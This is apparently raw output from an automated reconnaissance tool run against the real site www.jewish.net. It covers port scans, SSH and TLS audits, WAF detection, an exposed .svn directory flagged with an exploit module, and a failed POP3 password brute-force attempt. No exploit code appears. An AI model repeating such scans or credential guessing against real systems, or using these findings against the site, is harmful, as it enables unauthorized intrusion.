- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ takeover v0.5.0 - by @michenriksen
- Loaded 3 hosts from /root/aquatone/www.jewish.net/hosts.json
- Loaded 25 domain takeover detectors
- Identifying nameservers for www.jewish.net... Done
- Using nameservers:
- - 216.69.185.17
- - 173.201.74.17
- Checking hosts for domain takeover vulnerabilities...
- Finished checking hosts:
- - Vulnerable : 0
- - Not Vulnerable : 3
- Wrote 0 potential subdomain takeovers to:
- - file:///root/aquatone/www.jewish.net/takeovers.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ scan v0.5.0 - by @michenriksen
- Loaded 3 hosts from /root/aquatone/www.jewish.net/hosts.json
- Probing 4 ports...
- 80/tcp 209.140.28.114 update.jewish.net
- 80/tcp 69.73.184.159 jewish.net, www.jewish.net
- 443/tcp 69.73.184.159 jewish.net, www.jewish.net
- Wrote open ports to file:///root/aquatone/www.jewish.net/open_ports.txt
- Wrote URLs to file:///root/aquatone/www.jewish.net/urls.txt
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ gather v0.5.0 - by @michenriksen
- Processing 5 pages...
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:30 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.22s latency).
- Not shown: 429 filtered ports, 35 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 3306/tcp open mysql
- 5666/tcp open nrpe
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:31 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.13s latency).
- Not shown: 2 filtered ports, 1 closed port
- PORT STATE SERVICE
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:31 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|storage-misc|firewall|webcam
- Running (JUST GUESSING): Linux 4.X|3.X|2.6.X (92%), Synology DiskStation Manager 5.X (87%), WatchGuard Fireware 11.X (87%), Tandberg embedded (85%), FreeBSD 6.X (85%)
- OS CPE: cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:tandberg:vcs cpe:/o:freebsd:freebsd:6.2
- Aggressive OS guesses: Linux 4.4 (92%), Linux 3.10 - 3.12 (91%), Linux 2.6.18 - 2.6.22 (90%), Linux 4.9 (90%), Linux 4.0 (88%), Linux 2.6.18 (87%), Linux 3.10 - 3.16 (87%), Linux 3.10 - 4.11 (87%), Linux 3.11 - 4.1 (87%), Linux 3.18 (87%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 11 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 122.10 ms 10.244.200.1
- 2 122.12 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 122.14 ms 185.206.226.11
- 4 122.88 ms 80.231.153.49
- 5 ...
- 6 221.37 ms 4.69.150.161
- 7 213.54 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
- 8 213.96 ms 205.214.72.82
- 9 216.17 ms 209.51.149.106
- 10 215.19 ms 63.247.66.122
- 11 214.44 ms finn.nocdirect.com (69.73.184.159)
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_7.4
- (gen) software: OpenSSH 7.4
- (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) curve25519-sha256 -- [warn] unknown algorithm
- (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
- (key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
- (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
- # encryption algorithms (ciphers)
- (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
- `- [info] default cipher since OpenSSH 6.9.
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- # message authentication code algorithms
- (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 6.2
- (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
- (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 6.2
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 6.2
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # algorithm recommendations (for OpenSSH 7.4)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-sha2-512 -- mac algorithm to remove
- (rec) -umac-128@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha2-256 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
- (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:46 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 22/tcp filtered ssh
- Too many fingerprints match this host to give specific OS details
- Network Distance: 11 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 126.43 ms 10.244.200.1
- 2 135.41 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 126.47 ms 185.206.226.11
- 4 126.98 ms 80.231.153.49
- 5 ...
- 6 220.46 ms 4.69.150.161
- 7 219.08 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
- 8 219.48 ms 205.214.72.82
- 9 221.73 ms 209.51.149.106
- 10 219.97 ms 63.247.66.122
- 11 217.90 ms finn.nocdirect.com (69.73.184.159)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:48 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 67/udp open|filtered dhcps
- |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
- Too many fingerprints match this host to give specific OS details
- Network Distance: 11 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 122.70 ms 10.244.200.1
- 2 159.86 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 122.73 ms 185.206.226.11
- 4 123.23 ms 80.231.153.49
- 5 ...
- 6 216.32 ms 4.69.150.161
- 7 214.69 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
- 8 215.18 ms 205.214.72.82
- 9 217.52 ms 209.51.149.106
- 10 215.99 ms 63.247.66.122
- 11 212.59 ms finn.nocdirect.com (69.73.184.159)
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:50 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 68/udp open|filtered dhcpc
- Too many fingerprints match this host to give specific OS details
- Network Distance: 11 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 128.88 ms 10.244.200.1
- 2 176.19 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 129.09 ms 185.206.226.11
- 4 129.49 ms 80.231.153.49
- 5 ...
- 6 223.27 ms 4.69.150.161
- 7 221.51 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
- 8 221.56 ms 205.214.72.82
- 9 223.68 ms 209.51.149.106
- 10 222.49 ms 63.247.66.122
- 11 215.04 ms finn.nocdirect.com (69.73.184.159)
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 19:52 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 69/udp open|filtered tftp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 11 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 122.03 ms 10.244.200.1
- 2 152.25 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 122.07 ms 185.206.226.11
- 4 122.41 ms 80.231.153.49
- 5 ...
- 6 215.49 ms 4.69.150.161
- 7 214.24 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
- 8 214.67 ms 205.214.72.82
- 9 216.90 ms 209.51.149.106
- 10 215.49 ms 63.247.66.122
- 11 213.94 ms finn.nocdirect.com (69.73.184.159)
- ######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.jewish.net
- The site http://www.jewish.net is behind a ModSecurity (OWASP CRS)
- Number of requests: 11
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://www.jewish.net...
- __________________ SITE INFO __________________
- IP Title
- 69.73.184.159 Jewish and Israeli Web Direc
- ___________________ VERSION ___________________
- Name Versions Type
- _______________________________________________
- Time: 226.3 sec Urls: 612 Fingerprints: 40401
- ######################################################################################################################################
- ------------------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [12-11-2018 20:01:45]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.jewish.net.txt ]
- [ INFO ][ DORK ]::[ site:www.jewish.net ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.my ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.fm ID: 007843865286850066037:b0heuatvay8 ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
- [ INFO ] Not a satisfactory result was found!
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [12-11-2018 20:01:53]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.jewish.net.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:01 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.15s latency).
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 55 guesses in 41 seconds, average tps: 1.3
- |_ ERROR: Failed to connect.
- |_pop3-capabilities: AUTH-RESP-CODE TOP USER STLS SASL(PLAIN LOGIN) RESP-CODES PIPELINING UIDL CAPA
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|storage-misc|firewall
- Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (92%), Synology DiskStation Manager 5.X (86%), WatchGuard Fireware 11.X (86%), FreeBSD 6.X (85%)
- OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/o:freebsd:freebsd:6.2
- Aggressive OS guesses: Linux 3.10 - 3.12 (92%), Linux 4.4 (92%), Linux 4.9 (91%), Linux 2.6.18 - 2.6.22 (90%), Linux 3.10 (87%), Linux 4.0 (87%), Linux 2.6.18 (86%), Linux 3.10 - 4.11 (86%), Linux 3.11 - 4.1 (86%), Linux 3.2 - 4.9 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 126.40 ms 69.73.184.159
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:03 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 123/udp open|filtered ntp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 11 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 123.82 ms 10.244.200.1
- 2 124.07 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 123.87 ms 185.206.226.11
- 4 124.53 ms 80.231.153.49
- 5 124.75 ms 80.231.153.66
- 6 217.57 ms 4.69.150.161
- 7 216.18 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
- 8 216.30 ms 205.214.72.82
- 9 218.80 ms l3-atl-v1-p40.netdepot.com (209.51.149.106)
- 10 222.47 ms 63.247.66.122
- 11 212.08 ms 69.73.184.159
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:05 EST
- Nmap scan report for www.jewish.net (69.73.184.159)
- Host is up (0.18s latency).
- PORT STATE SERVICE VERSION
- 161/tcp filtered snmp
- 161/udp open|filtered snmp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 11 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 121.34 ms 10.244.200.1
- 2 124.13 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 121.39 ms 185.206.226.11
- 4 121.92 ms 80.231.153.49
- 5 122.35 ms 80.231.153.66
- 6 214.85 ms 4.69.150.161
- 7 213.71 ms ZAYO-BANDWI.edge1.Atlanta4.Level3.net (4.53.236.134)
- 8 214.04 ms 205.214.72.82
- 9 216.21 ms l3-atl-v1-p40.netdepot.com (209.51.149.106)
- 10 215.28 ms 63.247.66.122
- 11 216.12 ms 69.73.184.159
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://www.jewish.net
- The site https://www.jewish.net is behind a ModSecurity (OWASP CRS)
- Number of requests: 11
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginCompression
- PluginOpenSSLCipherSuites
- PluginSessionResumption
- PluginHSTS
- PluginChromeSha1Deprecation
- PluginCertInfo
- PluginHeartbleed
- PluginSessionRenegotiation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- www.jewish.net:443 => 69.73.184.159:443
- SCAN RESULTS FOR WWW.JEWISH.NET:443 - 69.73.184.159:443
- -------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 91d95c273ced329d0274e11eec58dc9ada560c21
- Common Name: jewish.net
- Issuer: cPanel, Inc. Certification Authority
- Serial Number: E6FED669853BBC45AB4654AB331C5B46
- Not Before: Dec 29 00:00:00 2017 GMT
- Not After: Mar 29 23:59:59 2018 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['jewish.net', 'www.jewish.net']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: certificate has expired
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: certificate has expired
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: certificate has expired
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: certificate has expired
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: certificate has expired
- Certificate Chain Received: ['jewish.net', 'cPanel, Inc. Certification Authority', 'COMODO RSA Certification Authority']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 4.30 S
- ------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 69.73.184.159
- Testing SSL server www.jewish.net on port 443 using SNI name www.jewish.net
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: jewish.net
- Altnames: DNS:jewish.net, DNS:www.jewish.net
- Issuer: cPanel, Inc. Certification Authority
- Not valid before: Dec 29 00:00:00 2017 GMT
- Not valid after: Mar 29 23:59:59 2018 GMT
- ######################################################################################################################################
- I, [2018-11-12T20:10:42.838163 #8470] INFO -- : Initiating port scan
- I, [2018-11-12T20:11:45.003293 #8470] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-12_20-10-42.xml
- I, [2018-11-12T20:11:45.004401 #8470] INFO -- : Discovered open port: 69.73.184.159:80
- I, [2018-11-12T20:11:45.957118 #8470] INFO -- : Discovered open port: 69.73.184.159:443
- I, [2018-11-12T20:11:47.715959 #8470] INFO -- : Discovered open port: 69.73.184.159:465
- I, [2018-11-12T20:11:49.065628 #8470] INFO -- : Discovered open port: 69.73.184.159:993
- I, [2018-11-12T20:11:51.247012 #8470] INFO -- : Discovered tcpwrapped port: 69.73.184.159:5666
- I, [2018-11-12T20:11:52.106733 #8470] INFO -- : Discovered tcpwrapped port: 69.73.184.159:5666
- I, [2018-11-12T20:11:53.833537 #8470] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +----------+---------------------------------+----------------------------------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +----------+---------------------------------+----------------------------------------------+----------+----------+
- | SVN | https://69.73.184.159:443/.svn/ | ./auxiliary/scanner/http/svn_wcdb_scanner.rb | | |
- +----------+---------------------------------+----------------------------------------------+----------+----------+
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:14 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 20:14
- Completed NSE at 20:14, 0.00s elapsed
- Initiating NSE at 20:14
- Completed NSE at 20:14, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 20:14
- Completed Parallel DNS resolution of 1 host. at 20:14, 16.50s elapsed
- Initiating SYN Stealth Scan at 20:14
- Scanning www.jewish.net (69.73.184.159) [474 ports]
- Discovered open port 110/tcp on 69.73.184.159
- Discovered open port 443/tcp on 69.73.184.159
- Discovered open port 21/tcp on 69.73.184.159
